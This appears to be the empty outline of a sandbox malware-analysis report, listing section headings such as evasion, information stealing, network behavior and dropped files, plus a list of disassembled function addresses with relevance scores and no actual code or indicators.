HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

Function 00418670, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36
filenativeCOMMON

Function 00409B40, Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Function 004185C0, Relevance: 1.5, APIs: 1, Instructions: 40
filenativeCOMMON

Function 004185BB, Relevance: 1.5, APIs: 1, Instructions: 40
filenativeCOMMON

Function 004187A0, Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Function 004186EA, Relevance: 1.5, APIs: 1, Instructions: 22
nativeCOMMON

Function 004186F0, Relevance: 1.5, APIs: 1, Instructions: 20
nativeCOMMON

Function 004088D0, Relevance: .1, Instructions: 92
COMMON

Function 00418890, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24
memoryCOMMON

Function 00407280, Relevance: 1.6, APIs: 1, Instructions: 55
threadwindowCOMMON

Function 004188C2, Relevance: 1.5, APIs: 1, Instructions: 28
memoryCOMMON

Function 004188D0, Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Function 00418A2B, Relevance: 1.5, APIs: 1, Instructions: 24
COMMON